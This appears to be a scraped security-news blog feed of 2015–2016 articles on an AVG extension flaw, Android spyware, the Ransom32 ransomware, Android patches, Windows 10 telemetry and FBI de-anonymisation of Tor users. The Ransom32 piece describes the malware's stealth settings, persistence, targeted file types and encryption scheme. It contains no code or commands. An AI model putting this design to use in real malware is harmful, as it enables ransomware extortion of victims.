Quantcast
Channel: Haktuts Free Spins
Viewing all 239 articles
Browse latest View live

AVG's Chrome extension exposes personal data of 9 million users

December 29, 2015, 10:04 pm
$
0
0


According to Ormandy’s report, the Chrome extension, dubbed AVG Web TuneUp and featuring extension id chfdnecihphmhljaaejmgoiahnihplgn, is force-installed on the end-user systems along with the AVG AntiVirus application. The extension adds a series of vulnerabilities to the browser, thus putting its more than 9 million installed users at risk.

The extension, which has over 9 million active users, contains a serious flaw that exposes users' 
  • Browsing history
  • Cookies, 
  • and Personal data 
....to attackers.

“This extension adds numerous JavaScript API's to chrome, apparently so that they can hijack search settings and the new tab page,” wrote Ormandy in the bug report. “The installation process is quite complicated so that they can bypass the chrome malware checks, which specifically tries to stop abuse of the extension API.”

Among the vulnerabilities that AVG Web TuneUp brings along, the researcher mentions a “trivial universal” XSS (Cross-Site Scripting) in the "navigate" API, which could allow websites to execute scripts in the context of any other domains. According to Ormandy, a website could read emails from mail.google.com and perform other actions as well because of this high-severity flaw.

Ormandy was involved in the discovery of vulnerabilities in Kaspersky's anti-virus product in September and a critical vulnerability in FireEye network security devices earlier this month.

Ormandy wrote in a follow-up response to the bug report Monday, “I believe this issue is resolved now, but inline installations are disabled while the CWS team investigate possible policy violations.”
Search

Now Android Malware Uses Firewell Rules To Evade Detection From Antivirus Security Applicaion

December 29, 2015, 11:02 pm
$
0
0
Android Malware Uses Firewell Rules To Evade Detection From Antivirus

Researchers at Symantec have discovered a new piece of Android malware that drops and runs a firewall binary called DroidWall on compromised devices to prevent security applications from connecting to their services.

Dubbed Android.Spywaller by Symantec, the malware initially behaves like other mobile threats by hiding its icon in an attempt to cover its track and by releasing an encrypted payload containing the malware service logic and loading it into memory. As soon as the threat has been installed on a compromised device, it displays a “Google Service” icon on the device, although the Internet giant doesn’t offer such a product.

At the same time, the spyware is collecting data belonging to specific third-party communication applications, including 
  • WhatsApp
  • Wechat
  • Skype
  • BlackBerry Messenger
  • Skype
  • Oovoo
  • Coco
  • QQ
  • SinaWeibo
  • Talkbox
  • TencentWeibo
  • Voxer
  • and Zello.
According to Symantec, the list of data gathered by this malware ranks it among the most comprehensive spyware to date.

The malware then attempts to root the device and start collecting sensitive information while running in the background. All of the information the malware collects from the device ,exfiltrate sensitive data from compromised devices and then sent to a backend server, Symantec explained in a recent blog post.

The Malware Collect the information including 

  • Call logs(PII)
  • SMS
  • GPS readings
  • Browser History
  • Browser Saved PasswordE
  • Emails
  • Radio
  • Images
  • and contacts.

While this behavior has been seen before in mobile threats, Symantec’s researchers note that the new malware stands out because of another method discovered in its reverse payload which checks to see if the Qihoo 360 mobile security app is installed on the device and then block it.

The Qihoo 360 application is popular in China and has a unique identifier (UID) on each device, and the malware collects the identifier if the program is installed. Next, Android Spywaller drops and runs the DroidWall firewall binary, which is a customized version of iptables for Android. This allows it to create firewall rules that will block the targeted security application by referencing its UID.

Developed by Rodrigo Rosauro as an open source app to help users protect their devices, DroidWall was sold to AVAST in 2011, but its source code is still available from Google Code and Github. Although it was initially designed in the form of a security tool, DroidWall can be used by cybercriminals to compromise user security.

For the time being, the malware is targeted at users in China, where a higher proportion of devices are rooted and more exposed to malware since official Google services are not available in the country.

The infection numbers are currenty relatively low, but the threat is worth noting because its authors are using legitimate tools for malicious purposes. To stay protected, users should install a security solution that can block mobile threats, should keep their software updated at all times, and should make sure they install apps only from trusted sources.

Ransom32 - The First Ransomware based on Javascript & Cross Platform Compatibility

January 4, 2016, 2:51 am
$
0
0

A new Ransomware as a Service, or RaaS, called Ransom32 has been discovered that for the first time uses a ransomware written in Javascript. Located on an underground TOR site, the Ransom32 RaaS is a simple, but efficient, service where anyone can download and distribute their very own copy of the ransomware executable as long as they have a bitcoin address.  For offering this service, the developers of Ransom32 take a 25% cut of all ransom payments and then forward the rest to the bitcoin address an affiliate entered when they joined the affiliate program.


The first Javascript Ransomware

What makes this ransomware unique is that it is the first ransomware programmed entirely in Javascript, HTML, and CSS.  This ransomware uses the NW.js platform that allows developers to create native applications for Linux, Mac, and Windows using HTML5, CSS3, Javascript, and WebGL.  Using NW.js a developer can take their scripts and html and package them into a Chromium executable that when executed automatically runs the embedded JS and HTML.

What makes the Ransom32 RaaS so scary is that Javscript and HTML are cross-platform and run equally as well on Macs and Linux as they do in Windows. This means that with some minor tweaks, the Ransom32 developers could easily make NW.js packages for Linux and Mac computer. Though there does not seem to be any indication that this is being done as of yet, doing so would be trivial.

It is inevitable that ransomware will be created for operating systems other than Windows Using a platform like NW.js just brings us one steps closer.

First Glance:

Ransom32 was first reported by infected users  Fabian Wosar of Emsisoft and Security Researcher xXToffeeXx searched for a sample they stumbled upon the Ransom32 TOR affiliate service. It is very easy for an affiliate to join this RaaS as all that is needed is a bitcoin address that the affiliate's share of the ransom payment will be sent to.




Once a bitcoin address is submitted, an affiliate will be shown an Affiliate Console where they can see the statistics for their personal distribution campaign and configure various settings on how the ransomware should be executed.





 
This affiliate console will contain statistics that include the number of people that successfully installed the client, the number of people that were shown the lock screen when the encryption was completed, the number of bitcoin transactions to your address, and the amount of ransom payments sent to your payout address.
In the console an affiliate will also be able to configure various settings for how the Ransom32 executable should run.

The listed settings and the Ransom32 developer's descriptions for them are:
BTC amount to ask:  BTC amount to ask. Don't be too greedy or people will not pay.

Fully lock the computer: By default the lockscreen will popup each X seconds after being minimized. You can configure it so the user will not be able to minimize the lock screen. The downside is that will be more difficult for the users to check that their files were truly encrypted and also they will need to find another method to send your Bitcoins as the browser will be blocked too.

Low CPU Usage: Will encrypt files at 0-25% speed while the lock window is not shown, so the process won't be noticeable in the task manager by an advanced user because of high CPU consumption.

Show the lockscreen before encrypting: By default the client will show the lockscreen after encrypting part of the files in the computer (filesize under 50 Mb) and continue encrypting in the background. You can tell it to show the lockscreen right after installing, before encrypting any file in the background. The downside is that if the user tries to check his files just when the window pops in, he will notice that any file has been encrypted (although it is encrypting while is running).

Show a message Box: This box will be shown before installing and before any latent timeout is applied.

Latent Timeout: The client will "wake up", connect to the server and start encrypting after this amount of seconds passed after installing. The client won't connect to the server until it wakes up (more stealth), so you won't notice an install in your stats until this moment. NOTE: The client will not save the latent info as-is. Will be mixed with some data so is not understandable at first sight. Because of this, expect a 0-4 minutes drift to your timeout.



Once an affiliate has configured the ransomware to their liking, they simply need to click on the download button to generate and download their customized copy of Ransom32.  This download is a self-extracting RAR file that weighs in at 22MB and when extracted totals over 67MB. Once the customized ransomware is downloaded, it is up to the affiliate to determine how it should be distributed.
An important feature for any "commerce" campaign is to be able to track its performance. As only a bitcoin address is required to join the affiliate program, it is very easy for an affiliate to track each distribution method's performance by simply using a different address for each campaign.




Encryption Process

The download that is generated by the affiliate is actually a 22MB self-extracting archive that when extracted is over 67MB.  When this executable is run, it will extract numerous files into the C:\Users\User\AppData\Roaming\Chrome Browser folder and creates a shortcut in the Start Menu's Startup Folder called ChromeService so that the ransomware starts at login.  The shortcut points to a chrome.exe executable that is actually a NW.js package that contains Javascript code that will encrypt the victim's data and then display a ransom note.
The files extracted into the Chome Browser folder are:
  • chrome - The Chromium license agreement.
  • chrome.exe - This is the main executable for the malware and is a packaged NW.js application bundled with Chromium.
  • ffmpegsumo.dll - HTML5 video decoder DLL that is bundled with Chromium.
  • - The settings file that contains various information used by the malware. This information includes the affiliate's ransom amount, bitcoin address that they receive payments on, and error message that is shown in a messagebox if the Show a message Box setting was enabled.
  • icudtl.dat - File used by Chromium
  • locales - Folder containing various language packs used by Chrome.
  • msgbox.vbs - The messagebox displayed if the affiliate enabled the Show a message Box setting.
  • nw.pak - Required for the NW.JS platform.
  • rundll32.exe - Renamed TOR executable so that the malware can communicate with the TOR Command and Control server.
  • s.exe - Renamed Shortcut.exe from OptimumX. This is a legitimate program used by the malware to create the ChromeService shortcut in the Startup folder.
  • u.vbs - A VBS script that deletes a specified folder and its contents.




 At glance it looks suspiciously like a copy of the famous browser "Chrome". The forgery is revealed only in that it does not have a digital signature and version information is missing. Further analysis they expose as a packed NW.js application.



When encrypting your data, Ransom32 will target only specific file extensions and encrypt them using AES encryption. The targeted file extensions are:

* .jpg, * .jpeg, * .raw, * .tif, * .gif, * .png, * .bmp, * .3dm, * .max, * .accdb, * .db, * .dbf, *. mdb, * .pdb, * .sql, *. * SAV *, *. * SPV *, *. * grle *, *. * MLX *, *. * SV5 *, *. * game *, *. * Slot *, * .dwg, * .dxf, * .c, * .cpp, * .cs, * .h, * .php, * .asp, * .rb, * .java, * .jar, * .class, * .aaf, * .aep, * .aepx, * .PLB, * .prel, * .prproj, * .aet, * .ppj, * .psd, * .indd, * .indl, * .indt, *. indb, * .inx, * .idml, * .pmd, * .xqx, * .xqx, * .ai, * .eps, * .ps, * .svg, * .swf, * .fla, * .as3, * .as, * .txt, * .doc, * .dot, * .docx, * .docm, * .dotx, * .dotm, * .docb, * .rtf, * .wpd, .wps, *. msg, * .pdf, * .xls, * .xlt, * .xlm, * .xlsx, * .xlsm, * .xltx, * .xltm, * .xlsb, * .xla, * .xlam, * .xll, * .xlw, * .ppt, * .pot, * .pps, * .pptx, * .pptm, * .potx, * .potm, * .ppam, * .ppsx, * .ppsm, * .sldx, *. sldm, * .wav, * .mp3, * .aif, * .iff, * .m3u, * .m4u, * .mid, * .mpa, * .wma, * .ra, * .avi, * .mov, * .mp4, * .3gp, * .mpeg, * .3g2, * .asf, * .asx, * .flv, * .mpg, * .wmv, * .vob, * .m3u8, * .csv, *. EFX, * .sdf, * .vcf, * .xml, * .ses, * .dat


 Notice how Ransom32 also uses wild cards in the targeted file extensions. This allows the program to to target a greater variety of extensions. For example, with the .*sav* extension, not only will .sav files be targeted, but also files ending with .save, .gamesave, or .mysaves will be encrypted as well.  When encrypting data files, it does not rename a victim's files and will not encrypt any files located in the following folders:

  • : \ Windows \
  • : \ winnt \
  • ProgramData \
  • boat\
  • temp \
  • tmp \
  • $ RECYCLE.BIN \ 


When it has finished encrypting your data it will display the Ransom32 ransom lock screen/ransom note as shown below.

 

The Ransom32 lock screen will display information that tells the victim what has happened to their files, how to pay the ransom, the ransom amount, and the bitcoin address a ransom payment is sent to. The language used by the lock screen is shown in either English or Spanish, with the default appearing to be English. Last, but not least, this screen allows you to decrypt one file for free to prove that it can be done.


 Encryption is performed under the AES (Advanced Encryption Standard) 128-bit key with the CTR mode. For each file, a new key is created. This in turn with the RSA algorithm and a public key encrypted, which was retrieved in the first communication with the C2 server.
 

Extract from the individual protocol exchange between Ransom32 and the C2 server to Bitcoin address (violet) and retrieve public keys (length in yellow, key in green).
 
The encrypted AES key is used together with the AES-encrypted data in the - saved file - now also encrypted.
 
The malware also offers to decrypt a single file again to prove the victim that the malware developer encryption can actually pick up again. For this purpose it sends the encrypted AES key of the selected file to the C2 server, which then sends back the decrypted AES key for the file.
  


Files installed by Ransom32:

%Temp%\nw3932_17475
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\ChromeService.lnk
%AppData%\Chrome Browser\
%AppData%\Chrome Browser\.chrome\
%AppData%\Chrome Browser\.chrome\cached-certs
%AppData%\Chrome Browser\.chrome\cached-microdesc-consensus
%AppData%\Chrome Browser\.chrome\cached-microdescs
%AppData%\Chrome Browser\.chrome\cached-microdescs.new
%AppData%\Chrome Browser\.chrome\lock
%AppData%\Chrome Browser\.chrome\state
%AppData%\Chrome Browser\chrome
%AppData%\Chrome Browser\chrome.exe
%AppData%\Chrome Browser\ffmpegsumo.dll
%AppData%\Chrome Browser\g
%AppData%\Chrome Browser\icudtl.dat
%AppData%\Chrome Browser\locales\
%AppData%\Chrome Browser\msgbox.vbs
%AppData%\Chrome Browser\n.l
%AppData%\Chrome Browser\n.q
%AppData%\Chrome Browser\nw.pak
%AppData%\Chrome Browser\rundll32.exe
%AppData%\Chrome Browser\s.exe
%AppData%\Chrome Browser\u.vbs
 

Unfortunately, at this time there is no known way to decrypt the files for free, but if anything changes we will post about it here.


Source: Emsisoft& BleepingComputer
 

Google Patches Another Critical Mediaserver Vulnerability

January 4, 2016, 9:53 pm
$
0
0
Google Patches Another Critical Mediaserver Vulnerability 

Since last summer’s Stagefright vulnerabilities toppled the Android world for a few weeks, researchers inside and out of Google have been taking a close look at not only the maligned media playback engine, but also at Mediaserver where it lives.

Today’s release of the monthly Android Nexus Security Bulletin includes patches for another critical vulnerability in Mediaserver, keeping a streak going of consecutive months with serious issues addressed in the software.

Flaws in Mediaserver pose serious problems for Android devices because it interacts with a number of applications that can be used to exploit the bug, including MMS and browser media playback features. Versions 5.0, 5.1.1, 6.0 and 6.0.1 are affected, Google said.

Google said in today’s advisory that the Mediaserver flaw, CVE-2015-6636, is the most serious among the dozen being patched, and that it allows an attacker to use email, web browsing MMS processing of media files to exploit the vulnerability and remotely execute code.
“During media file and data processing of a specially crafted file, vulnerabilities in mediaserver could allow an attacker to cause memory corruption and remote code execution as the mediaserver process,” Google said.
Google patched five vulnerabilities, including Mediaserver, that it rated critical, two rated high, and five others rated moderate.

The remaining critical flaws were all elevation of privilege issues in the misc-sd driver, the Imagination Technologies driver, Trustzone, the Android kernel and in the Bluetooth implementation.

The misc-sd driver and Imagination Technologies driver issues could malicious apps downloaded to the device to execute code at kernel level, and could result in a permanent compromise that would be addressed only by re-flashing the operating system, Google said.

The Trustzone vulnerabilities were found in the Widevine QSEE Trustzone application and would allow the compromise of apps with access to the QSEECOM to execute code in the Trustzone context, Google said.

A separate elevation of privilege issue was found in the kernel that would also open the door to malicious apps executing code in the kernel.

Of the two flaws rated High by Google, the one found in the Android Bluetooth component puts personal information at risk. It, Google said, could allow a device paired over Bluetooth to access personal information such as contacts.

The other rated high is an information disclosure vulnerability in the kernel that could allow an attacker to bypass security features in the operating system. Google added the flaws could be used to gain elevated privileges such as Signature or SignatureOrSystem.

The remaining vulnerabilities addressed today were rated moderate and include elevation of privilege flaws in the Android Setup Wizard and Wi-Fi, an information disclosure bug in Bouncy Castle crypto APIs, and a denial-of-service flaw in SyncManager.

Google also removed SysV IPC from Android because it is not supported in the OS and exposes additional attack surface.

The Sony PlayStation Network is down worldwide

January 4, 2016, 10:02 pm
$
0
0
Sony’s PlayStation network on PlayStation Vita, PlayStation 3 and PlayStation 4 are down and the irritating fact for gamers is that the company has not given any time frame when the service will be back online.

The PlayStation Network is down worldwide. I’m just back home trying to play with my son when I had the ugly surprise. It is the first massive outage of the year, I searched for information on the Internet and I have found that all the users are suffering the same problem.

Like many other users, I’m receiving an error message saying that the PSN is currently “undergoing maintenance”.

The PlayStation Network online service allows users to access online features of many games and to the official store.

Sony confirmed that the network was “experiencing issues” and its status page showed that the problems were affecting all of its major services, the company hasn’t provided further details on the problem.



Play Station Network also suffered technical issues over the Christmas period, some users reported difficulties in authenticating the online services.

Last year hackers belonging to the hacking group of the Lizard Squad took down at Christmas the online networks of both Microsoft Xbox Live and PlayStation network (PSN) highlighting security issues affecting the services of Sony and Microsoft.

This year another group known as Phantom Squad announced its intention to ruin Christmas for gamers. Phantom Squad also said that both platforms are vulnerable to attacks, and they add that they were able to take down Xbox live during the weekend.

At the time I was writing, the Sony’s “Network Service Status” confirmed the problems suffered by users accessing the Sony platform.



The Sony Play Station network is down, including the PlayStation 3 and 4 and web services.
A screenshot from status.playstation.com shows the service is down:
Imag
It is unclear what caused the outage worldwide nor any hacking group has accepted responsibility for targeting the PlayStation network with their usual DDoS attacks. However, one Twitter user shared an Interesting DDoS map showing cyber attacks on the US from Chinese side (That doesn’t mean there was an attack on PlayStation network by Chinese hackers).

Microsoft with its ‘Super Spy’ Windows 10 is collecting more data than thought before

January 6, 2016, 10:53 am
$
0
0

The Redmond software giant Microsoft’s Windows 10 is fast becoming world’s preferred operating system over Windows 7 or 8.1. Despite its continued insistence that Windows 10 isn’t spying on anyone, Microsoft seems to have taken an interest in how much time you are using its Windows 10 operating system. However, Microsoft has done little to assure the majority of privacy conscious users that its latest operating system isn’t taking more data than it needs.
In order to emphasize its claim, Microsoft updated its privacy policy to clear how and when the OS makes use of user data. However, with its latest Threshold 2 Update, Microsoft is observing how long people are using the operating system and sending the data to Redmond.
The enthusiasm was shared by Microsoft in a blog post filled with data extracted from users.
On Monday morning, Yusuf Mehdi, Corporate VP of the Windows and Devices Group, disclosed that Windows 10 was active on over 200 million devices. The main factor that is contributing its quick growth is that is currently offered for free to existing Windows users on Windows 7 or Windows 8.1. So, it is really not astonishing if this is happening.
Microsoft felt the need to share some milestones to demonstrate the popularity of Windows 10:
1. People spent more than 11 billion hours on Windows 10 in December 2015.
2. 44.5 billion minutes were spent in Microsoft Edge across Windows 10 devices in December 2015 (0.71 billion hours).
3. Users asked Cortana more than 2.5 billion questions since launch.
4. More than 82 billion photos were viewed in the Windows 10 Photo application.
5. Windows 10 gamers spent over 4 billion hours playing PC games.
6. Gamers have streamed more than 6.6 million hours of Xbox One games to Windows 10 PCs.
7. About 30% more Bing search queries from Windows devices compared to previous versions of Windows.
Definitely, these are interesting statistics and could be troublesome for many privacy lovers.
“The statistics indicate that Microsoft may be collecting more data than initially thought,” writes Martin Brinkmann of ghacks. “While it is unclear what data is exactly collected, it is clear that the company is collecting information about the use of individual applications and programs on Windows at the very least.”
Data collection to a degree is unavoidable, as it occurs on every connected device. However, what is more bothersome about Windows 10 is that there is no clarity on what data is exactly being collected and there’s no easy way to turn it off.
According to Microsoft, the data collection in Windows 10 is for a greater good. It is being used to make the product work better and that is certainly true to an extent as the company is collecting information about the use of individual applications and programs on Windows to find out about the popularity of an application or operating system feature.
Still, since Microsoft does not reveal detailed information about what gets collected and to what end, it is something that users need to be aware about at the very least. We can only hope that while Microsoft celebrates its 2015 milestones, it looks to become more transparent in 2016.

Facebook bug welcomes new year by telling users they have been friends for 46 years

January 6, 2016, 8:27 pm
$
0
0

Facebook bug Tells Users They’ve Been Friends for 46 Years

As the world was celebrating New Year, Facebook seemed to be having its own celebrations. A bug in Facebook was telling users that they’ve been friends for 46 years.

It is silly to think that Facebook remembers who were friends with 46 years ago because Facebook wasn’t around that many years ago in 1969. In fact millions of FB users were not even born while computers were used only for military purposes.

The date Dec. 31, 1969 carries special significance for computer software, according to the Daily Dot. That date is the first to appear in time tracking software for Unix computer systems called Unix Epoch. Although not confirmed by Facebook, many are suggesting the bug originates with what’s known as the Unix epoch.

Facebook said in a statement that the company is working to address the issue. “We’ve identified this bug and the team’s fixing it now so everyone can ring in 2016 feeling young again,” said Facebook spokesperson Chelsea Kohler in an email.

Users were quick to pounce on Facebook for this glitch as can be seen from the tweets below :

Court orders Google to pay Dr Janice Duffy $100,000 plus interest for not removing her from Google Search

January 6, 2016, 9:17 pm
$
0
0

Court orders Google to pay Dr Janice Duffy $100,000 plus interest for not removing her from Google Search

An Australian woman has been awarded $100,000 in damages, plus interest after she successfully won the defamation case filed against Google.
Janice Duffy, 59, a former SA health department researcher took the internet search giant to court after claiming articles published on the “Ripoff Report” website from 2007 defamed her. The site is a “shaming platform” that allows anyone to post reports about people whom they suspect are behaving in a criminal or dishonest manner, regardless of its factual accuracy.
Despite bringing the articles to their attention, Google denied her request to remove the webpages from its search engine inspite of telling them that her prospective employers could chance upon the material.
Finally, in 2011, she launched a civil lawsuit against Google in the South Australian Supreme Court, as for two years, it refused her written requests to take action on her behalf.
The court heard Google progressively removed the display of extracts from and links to the “Ripoff Report” from its Australian website.
Dr Duffy also claimed the auto-complete search terms suggested by Google were harmful, due to them directing users to the “Ripoff Report” site.
Also See:Facebook bug welcomes new year by telling users they have been friends for 46 years

Google fought the case, arguing defences of innocent dissemination, qualified privilege, justification and contextual truth.
In his judgment in October, Justice Malcolm Blue struck out several of the defences.
He found the search results either published, republished or directed users towards comments harmful to her reputation.
On Wednesday, Justice Blue awarded Dr Duffy damages of $100,000 and a $15,000 lump sum to cover interest.
Dr Duffy’s lawyer, Paul Heywood-Smith, has also asked the Supreme Court to make an order for costs to cover the legal fees his client has paid during the lengthy battle.
The court has reserved its decision on costs.
Counsel for Google has asked payment of those amounts to be stayed until January, pending argument on court costs and a possible appeal.
‘I stood up to them and for that I’m pleased’
Dr Duffy has tweeted that if Google was to launch any appeal, she would respond with a “cross appeal”.
Outside court, she described Wednesday’s ruling as “vindication”.
“It’s been a long battle and it’s not over,” she said.
“After the trial I couldn’t get off the couch for three weeks … but it’s something that has to be done.
“I think that they thought that they could make me go away. I’m stubborn.
“I stood up to them and for that I’m pleased. I beat the bastards.”
Earlier this year, Dr Duffy represented herself during the trial, after initially being represented by lawyers.
Since the trial she has again hired legal representation.
The ruling comes after Google was ordered by the European Court of Justice to introduce the “right to be forgotten”, which means old, inaccurate or irrelevant data must be omitted from search results if a person involved requests it.
Search

Forbes Website Dropping Malware on Visitor’s PCs

January 7, 2016, 3:01 am
$
0
0
Web publications usually ask readers to disable ad blockers if visiting their websites with AdBlock on. It is understandable since publishers rely upon advertisements for income and therefore, want users to not turn on adblockers. But for a reader, it becomes quite irritating to let adverts ruin the reading experience.
Reportedly, Brian Baskin digital forensics expert was served with a malware when he obliged Forbes by turning off ad-blocker.
However, when we checked the site, nothing of this sort happened to us so probably Baskin experienced a javascript snippet or an undetected malware banner. But, for the end user, it doesn’t matter if Forbes is actually spreading the malware or is unaware of it because the damage is already done.
Back in 2007, if the malware mess wasn’t cleaned up by ad banner networks, web users had the liberty to block all ads.
Ad banner networks were given ten long years to fix the issue because they make more money than the publishers who display these ads on their websites, reports AdLand.
Yet, neither the publishers have invested in malware detection nor have ad banner networks come up with a suitable solution.
Ad blocker although has launched the “acceptable ads” program and Apple as well as other device manufacturers are already blocking ads on their devices but the publishers are still inactive in this regard.
This is not the first time when Forbes website was caught spreading malware. In February last year, cyber criminals exploited Flash and IE Zero-day vulnerabilities to install malware on anyone visiting the site.

Semantic Search Engine Omnity Claims That It Can Beat Google And Buy It

January 7, 2016, 9:22 pm
$
0
0

One new search engine is so confident in its technology that it thinks it could buy Google, and not the other way around.
Just a couple of days ago, Omnity was announced as a “next-generation semantic search and discovery tool”. The company calls itself a fundamental advancement in discovering technology and enabling the people to discover hidden interconnection between fields like finance, law, science, engineering, and medicine.
What this lets users do is avoid the tyranny of taxonomy,” said Omnity CEO Brian Sager at a Tuesday evening CES event called Digital Experience. “We probably should trademark that,” he then joked.

How Omnity performs a search operation?

Omnity release post explains that the search engine allows a user to use the complete document as a search query and discover the connected documents based on the content inside the document. This way, it finds related documents even if they are not directly related to each other via links.
Sager explained that when Omnity searches across documents, it throws out “grammatical glue but semantic noise”—commonly used words like “the,” “he,” “she,” or “it.” Stripped of this “noise,” Omnity is then able to analyze the remaining “rare words” to find common threads that link together different documents.

“The Omnity product highlights several unusual features. For example, a single person reading and pair-wise interconnecting a 100,000 documents would take nearly 10,000 years. Omnity can perform this function in a fraction of a second, which represents a trillion-fold acceleration,” said Brain Sager, Omnity co-founder.
Sager wants to upend the basic idea of search just like Google performed the search in 1998 while looking for academic articles.

What about Omnity vs Google?

“We don’t view ourselves as being complementary and not competitive with Google,” said Sager. When asked by Motherboard if this meant Omnity was looking to be acquired by Google, he mentioned something very surprising.
I use Google every day and it’s great, but no, we’re more likely to buy Google.

World's First Anonymous Communications Network Called "PrivaTegrity" Launched

January 10, 2016, 10:30 am
$
0
0

Anonymous Communications Network Called PrivaTegrity launched Encryption Guru, David Chaum has released a new anonymity network concept called ‘PrivaTegrity’ that aims to fix many of Tor’s current problems, both in the legal and technical department. Chaum presented his paper, called “cMix: Anonymization by High-Performance Scalable Mixing” at the Real World Cryptography Conference in Stanford on 6th January, 2016.

His paper, called “cMix: Anonymization by High-Performance Scalable Mixing,” presents an evolution of the Mix Network concept, called cMix. The paper addresses several issues that governments and regular users had with the Mix Network. According to Chaum, now researchers plan to use this new cryptography protocol to build their own, more secure PrivaTegrity network, as an alternative to Tor.
Video Player
00:00
02:52
According to their research paper (page 1 – Section I, and page 4 – Chapter III-D), for each communications path established in a cMix network, the message sender creates connections with a series of trusted servers, with which it shares a series of keys.
When the sender sends out a message, its data is multiplied with all the keys. As the message passes through each server, it is divided with each server’s corresponding key, but also multiplied again by a random number. Messages are then stored randomized in each server’s buffer.
When the data needs to be retrieved and sent to the receiver, each server will retrieve the message from its random position, divide out the random numbers, and then multiply it with the recipient’s keys.
When the data arrives on the recipient’s computer, their keys are used to divide the data and decrypt the message.
 The cMix communication model
The cMix communication model
Chaum says that by moving most of the computational operations to the server, instead of the client, cMix achieves the same transfer speeds as Tor, but unlike its predecessor, it is not vulnerable to a series of “tagging” attacks.
Tagging attacks rely on compromising Tor nodes, which on their own allow attackers to tag input slots with their output location. By using cMix’s setup, the protocol is not vulnerable to these type of attacks, unless the malicious actor compromises all the elements of the protocol, which is very rare.
Additionally, researchers said that, in PrivaTegrity, tagging attacks are also blocked by how users set up keys with network nodes.
“PrivaTegrity aims to provide privacy at a technical level that is not penetrable by nation states,” the researchers claim. “PrivaTegrity implements a new approach to user identification requiring each user to provide a small but different type of identifying information to each mix node.

Kingston’s ‘Unhackable’ DataTraveler USB Drive Self-destructs With Incorrect PIN Entry

January 10, 2016, 8:57 pm
$
0
0
At CES 2016, Kingston has announced a new USB drive that’ll make the life easier for the privacy concerned users. This secure DataTraveler 2000 encrypted USB Flash drive is created to provide the best possible security measures to the IT professionals for carrying sensitive documents.


The USB drive looks impressive right from the outside. As you pull out the outer aluminum cover, a built-in keypad will be there to surprise you. When inserted into a computer, you’ll have to unlock the device by entering the correct PIN. Failing to do so in 10 attempts, the USB will self-destruct — sounds just like the pen drive from Hollywood flicks like Mission Impossible, right?

This USB 3.1 compatible thumb drive offers speeds of up to 135MBps read and 40MBps write. On the security front, DataTraveler 2000 comes with hardware-based full disk AES 256-bit encryption in XTS mode. The drive also protects your data from bruteforce attacks.


Kingston DataTraveler 2000 USB — PIN protection, AES 256-bit data encryption, resists bruteforce attacks


For additional protection, Kingston’s super-secure USB drive features the option of auto-locking the drive by deleting key and password files after 10 invalid login attempts.

“We are excited to add DataTraveler 2000 to our existing lineup of fast and encrypted USB Flash drives for organizations and SMBs,” said Ken Campbell, Flash business manager, Kingston. “It is the perfect option to deploy in the workforce where a uniform encrypted data storage solution that works on many different OS’ are in use.”

This OS independent USB drive works with all popular operating systems, even Android and ChromeOS. The DataTraveler 2000 is available in 16GB, 32GB and 64GB capacities.

The DataTraveler 2000 is expected to hit the markets in the end of 2016 Q1.

Also See:Semantic Search Engine Omnity Claims That It Can Beat Google And Buy It

FBI Started De-anonymizing The "Tor" Users Using Network Investigative Technique (NIT)

January 11, 2016, 8:49 pm
$
0
0
In July, at least two individuals from New York have been charged with online child pornography crimes after visiting a hidden service on the Tor network. The Federal Bureau of Investigation (FBI) had used a hacking tool to identify de-anonymize the suspects while surfing on the Tor network.

Now we have more information on the operation conducted by the FBI, the law enforcement hacked over a thousand computers, according to court documents reviewed by Motherboard.

It is the first time that the FBI conducted a so extended operation against Tor users.
According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”

The Playpen hidden service reached in one year over 200,000 users, with over 117,000 total posts mainly containing child pornography content. The law enforcement discovered nearly 1300 IP addresses belonging to the visitors.

FBI hacked Tor Users child pornography NIT
According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, then the law enforcement managed the computer to track its visitors. The agents used the a network investigative technique (NIT) to obtain the IP addresses of the Playpen users.

It isn’t the first time that the FBI used the NIT to de-anonymize Tor users, on December 22nd, 2014 Mr. Joseph Gross retained the assistance of Dr. Ashley Podhradsky, Dr. Matt Miller, and Mr. Josh Stroschein to provide the testimony as the expert in the process against pedo’s on Tor.

The suspects were accused in federal court in Omaha of viewing and possessing of child pornography.

The NIT was a Flash-based application that was developed by H.D.Moore and was released as part of Metasploit. The NIT, or more formally, Metasploit Decloaking Engine was designed to provide the real IP address of web users, regardless of proxy settings.” stated the forensic report.
de anonymize Tor users NIT
According to the act of the process, the investigators were informed that there were three servers containing contraband images that the FBI found and took offline in November of 2012.

Also in that case the authorities used the server as a bait for online pedos, then the Bureau placed the NIT on the servers and used them to de-anonymize TOR users accessing the illegal content. With this technique, the FBI identified the IP addresses of visitors.
The NIT was also used in 2011, by agents running the “Operation Torpedo,” it was the first time that FBI deployed a tracking code broadly against every visitor to a website, instead of targeting a particular user.

According to some clues emerged in the Playpen case, the version of NIT currently used by the FBI is different from the one used in the past during the Operation Torpedo.
The legal counsel for one of the men accused speculates that the number of individuals charged with online child pornography crimes after visiting PlayPen may increase in the next months.
“Fifteen-hundred or so of these cases are going to end up getting filed out of the same, underlying investigation,” Colin Fieman, a federal public defender handling several of the related cases, told Motherboard in a phone interview. Fieman, who is representing Jay Michaud, a Vancouver teacher arrested in July 2015, said his estimate comes from what “we’ve seen in terms of the discovery.”
“There will probably be an escalating stream of these [cases] in the next six months or so,” said Colin Fieman, the federal public defender of Jay Michaud in a phone interview with Motherboard. “There is going to be a lot in the pipeline.”

Developer Shows Off Video Featuring iOS 9.3 Beta Jailbreak Demo

January 12, 2016, 3:53 am
$
0
0
While Apple seeds massive new iOS 9.3 beta to developers with new Night Shift mode, improved Notes, News, Health apps, and more. 

Developer Luca Tedesco has posted a video showing iOS 9.3 jailbreak on an iPhone 6.
He is the one that recently shared a screenshot of a jailbroken iPhone 6 running iOS 9.2.1.
Tedesco has previously been involved with Pangu9 jailbreak for iOS 9.0-9.0.2 devices, and has also released source code for jailbreaking iOS 8.4.1 on GitHub.

He had made it clear that he has no intention of sharing, and it doesn’t look like that’s changing anytime soon.

Well it's at least good news that iOS 9.3 is vulnerable and very much jailbreakable.
Hope that  Pangu, TaiG or another jailbreak team will soon release public jailbreak for iOS
9.1, 9.2, 9.2.1 and iOS 9.3.

In the video, luca Todesco shows off some of the new iOS 9.3 beta features that Apple released earlier , along with  iOS 9.3 jailbreak on iPhone 6 with Cydia.




'Ridiculous' antivirus flaw made Windows PCs vulnerable to attack

